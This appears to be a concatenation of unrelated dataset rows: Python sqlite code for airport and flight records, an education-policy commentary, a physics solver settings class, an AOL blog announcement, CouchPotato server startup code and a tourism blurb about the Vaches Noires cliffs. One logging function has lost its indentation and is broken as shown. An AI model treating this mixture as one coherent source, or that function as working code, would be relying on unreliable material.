    airport records stored as (country, state, airport) rows.
    """

    def __init__(self, db):  # ST
        """Connect to *db* and make sure the AIRPORTS table exists."""
        con = self.connectDB(db)
        if con is not None:
            self.connection = con
            self.cursor = self.connection.cursor()
            self.setupDB()

    def connectDB(self, db):  # ST
        """
        connectDB
        -- create simplified function with error handling
        -- to be used externally
        -- returns a connection or None
        """
        try:
            conn = sqlite3.connect(db)  # connect to database specified
            return conn
        except sqlite3.Error as e:  # catch all sqlite3 errors
            print(e)  # display error
            return None

    def setupDB(self):  # ST makes sure the db has correct table
        """Create the AIRPORTS table if it does not exist yet."""
        self.cursor.execute('''CREATE TABLE IF NOT EXISTS AIRPORTS (
                            id integer PRIMARY KEY AUTOINCREMENT,
                            country text NOT NULL,
                            state text NOT NULL,
                            airport text NOT NULL
                            )''')

    def insertAirport(self, query):  # ST
        """
        adds a new index to airports
        should be tuple of format
        (country, state, airport)
        """
        datastr = '''INSERT INTO AIRPORTS(country,state,airport) VALUES(?,?,?)'''
        try:
            self.cursor.execute(datastr, query)  # attempt to query
        except sqlite3.Error as e:  # catch error
            print(e, "failed")  # display error

    def insertAirports(self, table):  # ST calls insertAirport with table
        """Insert every (country, state, airport) tuple in *table*."""
        for query in table:
            self.insertAirport(query)

    def loadCountries(self):  # RH loads all countries in database
        """Return the country of every airport row (duplicates included)."""
        self.cursor.execute('SELECT country FROM AIRPORTS')
        return [row[0] for row in self.cursor.fetchall()]

    def loadStates(self, country):  # RH
        """Return the states of all airports located in *country*."""
        # Parameterized query: the previous string-formatted SQL was open to
        # SQL injection and broke on country names containing a quote.
        self.cursor.execute('SELECT state FROM AIRPORTS WHERE country = ?',
                            (country,))
        return [row[0] for row in self.cursor.fetchall()]

    def loadAirports(self, state):  # RH
        """Return the airports located in *state* (parameterized, see loadStates)."""
        self.cursor.execute('SELECT airport FROM AIRPORTS WHERE state = ?',
                            (state,))
        return [row[0] for row in self.cursor.fetchall()]

    def findAirport(self, airport):  # ST
        """Return the id of *airport*, or -1 when it is not in the table."""
        self.cursor.execute("SELECT id FROM AIRPORTS WHERE airport = ?", (airport,))
        val = self.cursor.fetchall()
        # Guard against an empty result set: the old code indexed val[0][0]
        # unconditionally and raised IndexError for unknown airports.
        if val and val[0][0] >= 0:
            return val[0][0]
        return -1

    def close(self):  # ST
        """Commit pending changes and close the database connection."""
        self.connection.commit()  # sync all changes
        self.connection.close()  # close db
class FlightDB(object):  # RH
    """Handle the FLIGHTS and PASSENGERS database tables."""

    def __init__(self, db):  # RH
        """Connect to *db* and make sure both tables exist."""
        con = self.connectDB(db)
        if con is not None:
            self.connection = con
            self.cursor = self.connection.cursor()
            self.setupDB()

    def connectDB(self, db):  # RH
        """
        connectDB
        -- create simplified function with error handling
        -- to be used externally
        -- returns a connection or None
        """
        try:
            conn = sqlite3.connect(db)  # connect to database specified
            return conn
        except sqlite3.Error as e:  # catch all sqlite3 errors
            print(e)  # display error
            return None

    def setupDB(self):  # RH
        """Create the FLIGHTS and PASSENGERS tables if missing."""
        self.cursor.execute('''CREATE TABLE IF NOT EXISTS FLIGHTS (
                            id integer PRIMARY KEY AUTOINCREMENT,
                            start int NOT NULL,
                            stop int NOT NULL,
                            flight_spec text NOT NULL,
                            address text NOT NULL,
                            billing_address text,
                            cost real NOT NULL,
                            payment_type int NOT NULL,
                            payment_card text
                            )''')
        self.cursor.execute('''CREATE TABLE IF NOT EXISTS PASSENGERS (
                            id integer PRIMARY KEY AUTOINCREMENT,
                            flight_id integer NOT NULL,
                            name text NOT NULL,
                            bags integer NOT NULL,
                            seating text NOT NULL
                            )''')

    def nextIndex(self):
        """Return the number of flight rows (used as the next flight index)."""
        self.cursor.execute("SELECT id FROM FLIGHTS")
        return len(self.cursor.fetchall())

    def insertFlight(self, query):  # RH
        # adds a new index to the flights table in the database.
        # *query* is an 8-tuple matching the non-id FLIGHTS columns.
        data = '''INSERT INTO FLIGHTS(start, stop, flight_spec, address, billing_address, cost, payment_type, payment_card) VALUES(?, ?, ?, ?, ?, ?, ?, ?)'''
        try:
            self.cursor.execute(data, query)
        except sqlite3.Error as e:
            print(e, "failed")

    def insertFlights(self, table):  # RH
        """Insert every flight tuple in *table*."""
        for query in table:
            self.insertFlight(query)

    def insertPassenger(self, query):  # RH
        # adds a new index to the passengers table in the database
        # *query* is a (flight_id, name, bags, seating) tuple.
        data = '''INSERT INTO PASSENGERS(flight_id, name, bags, seating) VALUES(?, ?, ?, ?)'''
        try:
            self.cursor.execute(data, query)
        except sqlite3.Error as e:
            print(e, "failed")

    def insertPassangers(self, table):  # RH
        # NOTE: misspelled name kept for backward compatibility with callers.
        for query in table:
            self.insertPassenger(query)

    def loadFlights(self):  # RH
        """Print and return all flight rows.

        Bug fix: the previous statement 'SELECT FLIGHTS' was not valid SQL
        (missing the column list and FROM keyword) and always raised
        sqlite3.OperationalError.
        """
        self.cursor.execute('SELECT * FROM FLIGHTS')
        all_flights = self.cursor.fetchall()
        print(all_flights)
        return all_flights

    def loadPassangers(self):  # RH
        """Print and return all passenger rows (same SQL fix as loadFlights)."""
        self.cursor.execute('SELECT * FROM PASSENGERS')
        all_passengers = self.cursor.fetchall()
        print(all_passengers)
        return all_passengers

    def close(self):  # RH
        """Commit pending changes and close the connection."""
        self.connection.commit()
        self.connection.close()
def main():
    """Program entry point (placeholder — no behavior implemented yet)."""
    return None
# Run main() only when this file is executed directly, not when imported.
if __name__ == "__main__":
    main()
|
Everybody breathe a sigh of relief. As we bake in the summer heat, at least we know that the federal Elementary and Secondary Education Act won’t be reauthorized until next year. That gives us some time to think before barreling ahead with the newest nostrum for what ails us.
The Obama administration plans to build the reauthorization around four areas. One is a strong curriculum and good tests of student learning; the second is good information about each child, so educators and parents can track and try to correct weaknesses; and the third is intensive intervention to improve student achievement in our lowest-performing schools.
But what if we don’t actually know what makes an effective teacher? Worse, suppose that other levers work better to raise student performance, but we are stuck with the “teacher effectiveness” model for another 10 years (the last reauthorization of the ESEA was the No Child Left Behind Act, which was signed into law in January of 2002 and remains the law of the land today). There is a thicket of competing theories about what makes an effective teacher. And, more troubling, studies show that while effective teachers are certainly important, they explain only a fraction of the difference in student performance.
We have seen these magic potions before. In NCLB, the potion was to assure that every teacher was “highly qualified” to teach the subject matter he or she was assigned to teach. When the magic potion was thought to be limiting class size, Florida and California spent billions of dollars on new classrooms and new teachers.
It is important not to be wrong. If we are wrong, we risk squandering the kids of this decade. One of the saddest stories of the last 40 years is that spending money in itself has a dishearteningly small effect on student achievement. The real increase in per-pupil expenditures over the last 40 years is more than double, and federal support has more than tripled. By contrast, the increase in achievement is mostly measured in low to middle single digits. Money does not seem to produce a general “Kumbaya” effect.
A second consideration is that if we don’t see more significant results, we may not get additional chances. The fact that there are relatively fewer school-age children, a concomitantly smaller voting constituency of parents, and greater financial demands from other social programs will make it harder to fund education substantially. The Congressional Budget Office predicts fewer and fewer dollars available for nondefense discretionary funding, a consequence of increases in entitlement spending. And the new health-care-reform legislation, whatever its virtues, will direct that much more money into non-education spending.
Most critically, despite the hype, we don’t have a high assurance that teacher effectiveness is in fact the most likely path to higher student achievement. And, even if it is, we don’t have a clear understanding of how to make teachers more effective.
Several analyses show that being assigned to different teachers can explain between 7 percent and 15 percent of the difference in student results in a particular year. A couple of outlier analyses show percentage results in the 20s in math. That is a good amount. If it cumulates year after year because students are getting good teachers in all these years, it can make for a huge difference, more than any factor we know of so far that social policy can change.
But assigning students to different teachers does not account for the vast majority of the variation in student performance in any year. And we can’t hope to provide highly effective teachers to all students year after year, so the likely mix won’t achieve uniformly the level of change that excellent teaching might otherwise provide.
One of the saddest stories of the last 40 years is that spending money in itself has a dishearteningly small effect on student achievement.
Moreover, we don’t know what goes into making an effective teacher. Several elements seem to count, but sorting them out will take time. One element is the teacher’s years in service. A second is subject-matter knowledge, the last ESEA reauthorization’s savior. A “new” entrant in the “here’s what does it” sweepstakes is the old ed. school standby, pedagogical technique: Circulate around your classroom, and break down questions not answered correctly into smaller questions. These differing approaches suggest that we don’t yet know the best ways to change teachers so that they can help significantly alter student outcomes.
Meanwhile, emphasizing the individual teacher will slight other factors that may prove more important. For example, promising neuroscientific research is now telling us more about how kids learn. Differently designed curricula or electronically based education may allow for the pacing and explanation that could prove most significant. Or, an understanding of cognitive differences may affect the way a particular student is taught. It may be best to base awards on who picks the best curricula. Or it may be that some factor currently in the mix proves far more influential than expected, such as a student’s health and fitness. The greatest bang for the buck may be in green beans. In the meantime, though, we’ll be stuck with a reauthorized federal education law that centers the action on relating the teacher to the outcome.
So, what should be the objective for the next authorization? How about keeping the effectiveness yardstick but not prejudging what’s considered effective—letting the marketplace of functionality make the choice. This could be somewhat like the criteria used in the federal Investing in Innovation, or i3, competition. There, funds are to go variously to proposals with a “strong base” of evidence that student achievement will be significantly improved, or “good” evidence, or “high potential.” The link to achievement should be direct, not through a way station. We would reap greater rewards when different approaches worked out, and when new developments allowed for new approaches.
Luckily, we know the main measures of student growth. The differences in emphasis—student test scores alone or graduation rates, too, for example—will need to be resolved. This is true whether improvement is seen as the direct measure of school effectiveness or a proxy for teacher effectiveness. When there is so much uncertainty about whether we are right, let’s put our true objective in the forefront, rather than what we currently think may be most closely associated with it.
Of course, teacher effectiveness may very well turn out to be the key to student learning—in which case, states and school systems will gravitate to a teacher-based evaluation system anyway. But if other methods work better, or the best methods change over time, let’s allow our school systems to follow the sun.
Jay P. Urwitz is a member of the board of trustees of Teachers College, Columbia University, and serves on the board of the Woodrow Wilson National Fellowship Foundation. He practices education law as a partner at the law firm of WilmerHale, in Washington.
“Commentary: How Race to the Top Could Inform ESEA Reauthorization,” June 28, 2010.
|
"""Module containing FunctionProperties class."""
class FunctionProperties(object):
    """
    Class containing miscellaneous variables for Approach and Approach2vN classes.

    Attributes
    ----------
    symq : bool
        For symq=False keep all equations in the kernel, and the matrix is of size N by N+1.
        For symq=True replace one equation by the normalisation condition,
        and the matrix is square N by N.
    norm_row : int
        If symq=True this row will be replaced by normalisation condition in the kernel matrix.
    solmethod : string
        String specifying the solution method of the equation L(Phi0)=0.
        The possible values are matrix inversion 'solve' and least squares 'lsqr'.
        Method 'solve' works only when symq=True.
        For matrix free methods (used when mfreeq=True) the possible values are
        'krylov', 'broyden', etc.
    itype : int
        Type of integral for first order approach calculations.
        itype=0: the principal parts are evaluated using Fortran integration package QUADPACK \
                 routine dqawc through SciPy.
        itype=1: the principal parts are kept, but approximated by digamma function valid for \
                 large bandwidth D.
        itype=2: the principal parts are neglected.
        itype=3: the principal parts are neglected and infinite bandwidth D is assumed.
    dqawc_limit : int
        For itype=0 dqawc_limit determines the maximum number of sub-intervals
        in the partition of the given integration interval.
    mfreeq : bool
        If mfreeq=True the matrix free solution method is used for first order methods.
    phi0_init : array
        For mfreeq=True the initial value of zeroth order density matrix elements.
    mtype_qd : float or complex
        Type for the many-body quantum dot Hamiltonian matrix.
    mtype_leads : float or complex
        Type for the many-body tunneling matrix Tba.
    kpnt_left, kpnt_right : int
        Number of points Ek_grid is extended to the left and the right for '2vN' approach.
    ht_ker : array
        Kernel used when performing Hilbert transform using FFT.
        It is generated using specfunc.kernel_fredriksen(n).
    emin, emax : float
        Minimal and maximal energy in the updated Ek_grid generated by neumann2py.get_grid_ext(sys).
        Note that emin<=Dmin and emax>=Dmax.
    dmin, dmax : float
        Bandedge Dmin and Dmax values of the lead electrons.
    ext_fct : float
        Multiplication factor used in neumann2py.get_grid_ext(sys), when determining emin and emax.
    suppress_err : bool
        Determines whether to print the warning when the inversion of the kernel failed.
    off_diag_corrections : bool
        Determines whether to include first order off-diagonal corrections to the kernel in the
        RTD approach.
    """

    def __init__(self,
                 kerntype='2vN', symq=True, norm_row=0, solmethod=None,
                 itype=0, dqawc_limit=10000, mfreeq=False, phi0_init=None,
                 mtype_qd=float, mtype_leads=complex, kpnt=None, dband=None,
                 off_diag_corrections=True):
        # Kernel type and linear-system configuration
        self.kerntype = kerntype
        self.symq = symq
        self.norm_row = norm_row
        self.solmethod = solmethod
        # Principal-part integral settings
        self.itype = itype
        self.dqawc_limit = dqawc_limit
        # Matrix-free solver settings
        self.mfreeq = mfreeq
        self.phi0_init = phi0_init
        # Matrix element types
        self.mtype_qd = mtype_qd
        self.mtype_leads = mtype_leads
        # Energy-grid parameters
        self.kpnt = kpnt
        self.dband = dband
        # '2vN' grid extension state (filled in later by the approach code)
        self.kpnt_left = 0
        self.kpnt_right = 0
        self.ht_ker = None
        # Band edges and extended-grid limits (updated during calculation)
        self.dmin, self.dmax = 0, 0
        self.emin, self.emax = 0, 0
        self.ext_fct = 1.1
        # One-shot warning/error suppression flags
        self.suppress_err = False
        self.suppress_wrn = [False]
        #
        self.off_diag_corrections = off_diag_corrections

    def print_error(self, exept):
        # Print the solver-failure warning once, then suppress repeats.
        if not self.suppress_err:
            print("WARNING: Could not solve the linear set of equations.\n" +
                  " Error from the solver: " + str(exept) + "\n"
                  " The reasons for such a failure can be various:\n" +
                  " 1. Some of the transport channels may be outside the bandwidth D of the leads.\n" +
                  " In this case removing some of the states with the method [remove_states()] will help.\n" +
                  " 2. Replacement of one of the equations with the normalisation condition.\n" +
                  " In this case try to use different [norm_row]\n"+
                  " or solve the linear system using [symq=False] and the solution method [solmethod='lsqr'].\n"
                  " This warning will not be shown again.\n"
                  " To check if the solution succeeded check the property [success].")
            self.suppress_err = True

    def print_warning(self, i, message):
        # Print warning number *i* once, then suppress repeats of that index.
        if not self.suppress_wrn[i]:
            print(message)
            self.suppress_wrn[i] = True
|
Going to work for a big company gets a really bad rap, I’m starting to learn. Everyone keeps telling me that my brain is going to turn to mush if I stay at AOL too long. The opposite has happened–it’s now been months and I have to say I’ve learned a heck of a lot.
One of the big lessons I’ve learned is from JonMiller, who’s always talking about extending our brands. It’ssomething we’ve started to take really, really seriously here atWeblogs, Inc. You maybe have noticed that Joystiq has spun off five niche sites, and that Engadget spun out Engadget Mobile.
Today we take another big step in extending our Autoblog franchise with AutoblogGreen.com: a blogdedicated to hybrid cars and technology.
We’ve launched AutoblogGreen in conjunction with AOL’s “Green Week” andEarthday (Green Week ishappening all over AOL: autos, blogging,finance, etc).
|
from logging import handlers
from uuid import uuid4
import locale
import logging
import os.path
import sys
import time
import traceback
import warnings
import re
import tarfile
import shutil
from CodernityDB.database_super_thread_safe import SuperThreadSafeDatabase
from argparse import ArgumentParser
from cache import FileSystemCache
from couchpotato import KeyHandler, LoginHandler, LogoutHandler
from couchpotato.api import NonBlockHandler, ApiHandler
from couchpotato.core.event import fireEventAsync, fireEvent
from couchpotato.core.helpers.encoding import sp
from couchpotato.core.helpers.variable import getDataDir, tryInt, getFreeSpace
import requests
from requests.packages.urllib3 import disable_warnings
from tornado.httpserver import HTTPServer
from tornado.web import Application, StaticFileHandler, RedirectHandler
def getOptions(args):
    """Parse the CouchPotato command line.

    Returns the parsed namespace with ``config_file`` and ``pid_file``
    defaulted to paths inside the data directory when not given explicitly.
    """
    parser = ArgumentParser(prog = 'CouchPotato.py')
    parser.add_argument('--data_dir',
                        dest = 'data_dir', help = 'Absolute or ~/ path of the data dir')
    parser.add_argument('--config_file',
                        dest = 'config_file', help = 'Absolute or ~/ path of the settings file (default DATA_DIR/settings.conf)')
    parser.add_argument('--debug', action = 'store_true',
                        dest = 'debug', help = 'Debug mode')
    parser.add_argument('--console_log', action = 'store_true',
                        dest = 'console_log', help = "Log to console")
    parser.add_argument('--quiet', action = 'store_true',
                        dest = 'quiet', help = 'No console logging')
    parser.add_argument('--daemon', action = 'store_true',
                        dest = 'daemon', help = 'Daemonize the app')
    parser.add_argument('--pid_file',
                        dest = 'pid_file', help = 'Path to pidfile needed for daemon')

    parsed = parser.parse_args(args)

    # Resolve the data directory first; the other default paths hang off it.
    base_dir = os.path.expanduser(parsed.data_dir or getDataDir())

    parsed.config_file = os.path.expanduser(
        parsed.config_file or os.path.join(base_dir, 'settings.conf'))
    parsed.pid_file = os.path.expanduser(
        parsed.pid_file or os.path.join(base_dir, 'couchpotato.pid'))

    return parsed
# Tornado monkey patch logging..
def _log(status_code, request):
if status_code < 400:
return
else:
log_method = logging.debug
request_time = 1000.0 * request.request_time()
summary = request.method + " " + request.uri + " (" + \
request.remote_ip + ")"
log_method("%d %s %.2fms", status_code, summary, request_time)
def runCouchPotato(options, base_path, args, data_dir = None, log_dir = None, Env = None, desktop = None):
    """Bootstrap and run the CouchPotato server.

    Sets up the locale/encoding, the CodernityDB database (with rotating
    backups), cache directories, the Env registry, logging, the Tornado
    application with its request handlers, then starts the IO loop with
    a retry when the port is already in use.
    """
    try:
        locale.setlocale(locale.LC_ALL, "")
        encoding = locale.getpreferredencoding()
    except (locale.Error, IOError):
        encoding = None

    # for OSes that are poorly configured I'll just force UTF-8
    if not encoding or encoding in ('ANSI_X3.4-1968', 'US-ASCII', 'ASCII'):
        encoding = 'UTF-8'

    Env.set('encoding', encoding)

    # Do db stuff
    db_path = sp(os.path.join(data_dir, 'database'))
    old_db_path = os.path.join(data_dir, 'couchpotato.db')

    # Remove database folder if both exists
    if os.path.isdir(db_path) and os.path.isfile(old_db_path):
        db = SuperThreadSafeDatabase(db_path)
        db.open()
        db.destroy()

    # Check if database exists
    db = SuperThreadSafeDatabase(db_path)
    db_exists = db.exists()
    if db_exists:

        # Backup before start and cleanup old backups
        backup_path = sp(os.path.join(data_dir, 'db_backup'))
        backup_count = 5
        existing_backups = []
        if not os.path.isdir(backup_path): os.makedirs(backup_path)

        for root, dirs, files in os.walk(backup_path):
            # Only consider files being a direct child of the backup_path
            if root == backup_path:
                for backup_file in sorted(files):
                    # Backup names are timestamps, e.g. 1400000000.tar.gz
                    ints = re.findall('\d+', backup_file)

                    # Delete non zip files
                    if len(ints) != 1:
                        try: os.remove(os.path.join(root, backup_file))
                        except: pass
                    else:
                        existing_backups.append((int(ints[0]), backup_file))
            else:
                # Delete stray directories.
                shutil.rmtree(root)

        # Remove all but the last 5
        for eb in existing_backups[:-backup_count]:
            os.remove(os.path.join(backup_path, eb[1]))

        # Create new backup
        new_backup = sp(os.path.join(backup_path, '%s.tar.gz' % int(time.time())))
        zipf = tarfile.open(new_backup, 'w:gz')
        for root, dirs, files in os.walk(db_path):
            for zfilename in files:
                zipf.add(os.path.join(root, zfilename), arcname = 'database/%s' % os.path.join(root[len(db_path) + 1:], zfilename))
        zipf.close()

        # Open last
        db.open()
    else:
        db.create()

    # Force creation of cachedir
    log_dir = sp(log_dir)
    cache_dir = sp(os.path.join(data_dir, 'cache'))
    python_cache = sp(os.path.join(cache_dir, 'python'))

    if not os.path.exists(cache_dir):
        os.mkdir(cache_dir)
    if not os.path.exists(python_cache):
        os.mkdir(python_cache)

    # Shared HTTP session for all outgoing requests
    session = requests.Session()
    session.max_redirects = 5

    # Register environment settings
    Env.set('app_dir', sp(base_path))
    Env.set('data_dir', sp(data_dir))
    Env.set('log_path', sp(os.path.join(log_dir, 'CouchPotato.log')))
    Env.set('db', db)
    Env.set('http_opener', session)
    Env.set('cache_dir', cache_dir)
    Env.set('cache', FileSystemCache(python_cache))
    Env.set('console_log', options.console_log)
    Env.set('quiet', options.quiet)
    Env.set('desktop', desktop)
    Env.set('daemonized', options.daemon)
    Env.set('args', args)
    Env.set('options', options)

    # Determine debug
    debug = options.debug or Env.setting('debug', default = False, type = 'bool')
    Env.set('debug', debug)

    # Development
    development = Env.setting('development', default = False, type = 'bool')
    Env.set('dev', development)

    # Disable logging for some modules
    for logger_name in ['enzyme', 'guessit', 'subliminal', 'apscheduler', 'tornado', 'requests']:
        logging.getLogger(logger_name).setLevel(logging.ERROR)

    for logger_name in ['gntp']:
        logging.getLogger(logger_name).setLevel(logging.WARNING)

    # Disable SSL warning
    disable_warnings()

    # Use reloader (only in development, outside daemon/desktop mode)
    reloader = debug is True and development and not Env.get('desktop') and not options.daemon

    # Logger
    logger = logging.getLogger()
    formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s', '%m-%d %H:%M:%S')
    level = logging.DEBUG if debug else logging.INFO
    logger.setLevel(level)
    logging.addLevelName(19, 'INFO')

    # To screen
    if (debug or options.console_log) and not options.quiet and not options.daemon:
        hdlr = logging.StreamHandler(sys.stderr)
        hdlr.setFormatter(formatter)
        logger.addHandler(hdlr)

    # To file
    hdlr2 = handlers.RotatingFileHandler(Env.get('log_path'), 'a', 500000, 10, encoding = Env.get('encoding'))
    hdlr2.setFormatter(formatter)
    logger.addHandler(hdlr2)

    # Start logging & enable colors
    # noinspection PyUnresolvedReferences
    import color_logs
    from couchpotato.core.logger import CPLog
    log = CPLog(__name__)
    log.debug('Started with options %s', options)

    # Check available space
    try:
        total_space, available_space = getFreeSpace(data_dir)
        if available_space < 100:
            log.error('Shutting down as CP needs some space to work. You\'ll get corrupted data otherwise. Only %sMB left', available_space)
            return
    except:
        log.error('Failed getting diskspace: %s', traceback.format_exc())

    def customwarn(message, category, filename, lineno, file = None, line = None):
        # NOTE(review): a single tuple is passed for four '%s' placeholders;
        # with stdlib lazy %-formatting this would fail — confirm CPLog's
        # argument handling, or unpack the tuple.
        log.warning('%s %s %s line:%s', (category, message, filename, lineno))
    warnings.showwarning = customwarn

    # Create app
    from couchpotato import WebHandler
    web_base = ('/' + Env.setting('url_base').lstrip('/') + '/') if Env.setting('url_base') else '/'
    Env.set('web_base', web_base)

    api_key = Env.setting('api_key')
    if not api_key:
        api_key = uuid4().hex
        Env.setting('api_key', value = api_key)

    api_base = r'%sapi/%s/' % (web_base, api_key)
    Env.set('api_base', api_base)

    # Basic config
    host = Env.setting('host', default = '0.0.0.0')
    host6 = Env.setting('host6', default = '::')

    config = {
        'use_reloader': reloader,
        'port': tryInt(Env.setting('port', default = 5050)),
        'host': host if host and len(host) > 0 else '0.0.0.0',
        'host6': host6 if host6 and len(host6) > 0 else '::',
        'ssl_cert': Env.setting('ssl_cert', default = None),
        'ssl_key': Env.setting('ssl_key', default = None),
    }

    # Load the app
    application = Application(
        [],
        log_function = lambda x: None,
        debug = config['use_reloader'],
        gzip = True,
        cookie_secret = api_key,
        login_url = '%slogin/' % web_base,
    )
    Env.set('app', application)

    # Request handlers
    application.add_handlers(".*$", [
        (r'%snonblock/(.*)(/?)' % api_base, NonBlockHandler),

        # API handlers
        (r'%s(.*)(/?)' % api_base, ApiHandler),  # Main API handler
        (r'%sgetkey(/?)' % web_base, KeyHandler),  # Get API key
        (r'%s' % api_base, RedirectHandler, {"url": web_base + 'docs/'}),  # API docs

        # Login handlers
        (r'%slogin(/?)' % web_base, LoginHandler),
        (r'%slogout(/?)' % web_base, LogoutHandler),

        # Catch all webhandlers
        (r'%s(.*)(/?)' % web_base, WebHandler),
        (r'(.*)', WebHandler),
    ])

    # Static paths
    static_path = '%sstatic/' % web_base
    for dir_name in ['fonts', 'images', 'scripts', 'style']:
        application.add_handlers(".*$", [
            ('%s%s/(.*)' % (static_path, dir_name), StaticFileHandler, {'path': sp(os.path.join(base_path, 'couchpotato', 'static', dir_name))})
        ])
    Env.set('static_path', static_path)

    # Load configs & plugins
    loader = Env.get('loader')
    loader.preload(root = sp(base_path))
    loader.run()

    # Fill database with needed stuff
    fireEvent('database.setup')
    if not db_exists:
        fireEvent('app.initialize', in_order = True)
    fireEvent('app.migrate')

    # Go go go!
    from tornado.ioloop import IOLoop
    from tornado.autoreload import add_reload_hook
    loop = IOLoop.current()

    # Reload hook
    def reload_hook():
        fireEvent('app.shutdown')

    add_reload_hook(reload_hook)

    # Some logging and fire load event
    try: log.info('Starting server on port %(port)s', config)
    except: pass
    fireEventAsync('app.load')

    ssl_options = None
    if config['ssl_cert'] and config['ssl_key']:
        ssl_options = {
            'certfile': config['ssl_cert'],
            'keyfile': config['ssl_key'],
        }

    server = HTTPServer(application, no_keep_alive = True, ssl_options = ssl_options)

    try_restart = True
    restart_tries = 5

    while try_restart:
        try:
            server.listen(config['port'], config['host'])

            if Env.setting('ipv6', default = False):
                try: server.listen(config['port'], config['host6'])
                except: log.info2('Tried to bind to IPV6 but failed')

            loop.start()
            server.close_all_connections()
            server.stop()
            loop.close(all_fds = True)
        except Exception as e:
            log.error('Failed starting: %s', traceback.format_exc())
            try:
                # NOTE(review): unpacking an exception as (nr, msg) only works on
                # Python 2; errno 48 is EADDRINUSE on BSD/OS X — confirm runtime.
                nr, msg = e
                if nr == 48:
                    log.info('Port (%s) needed for CouchPotato is already in use, try %s more time after few seconds', (config.get('port'), restart_tries))
                    time.sleep(1)
                    restart_tries -= 1

                    if restart_tries > 0:
                        continue
                    else:
                        return
            except ValueError:
                return
            except:
                pass

            raise

        try_restart = False
|
The emblem situated between Villers and Houlgate, the Vaches Noires cliffs, is a scientifically renowned palaeontological site.
Among other things, you can find the fossils of a 10-m-long pliosaur, an ichthyosaur, a sea “crocodile”, but also ammonites, sea urchins and sponges. To make this exclusive heritage popular, a giant dinosaur made of leaves has been placed at the heart of the city in the gardens situated in front of the Tourism Office. Throughout the years, it has become the real emblem of this resort. The dinosaur, 12-m long and 7-m high, is made of an iron frame filled with 6 tons of dirt where about 9,000 plants grow.
It has been created in June - so that these plants may grow enough - by the green area service of the city, that will remove it in November. Its coming back is an opportunity to organize a much-anticipated annual event announcing the beginning of summer!
Please note that recently this dinosaur has been accompanied by his son. Effective landmark in the area, it is admired by visitors that have transformed it into the main target of their souvenir photos.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.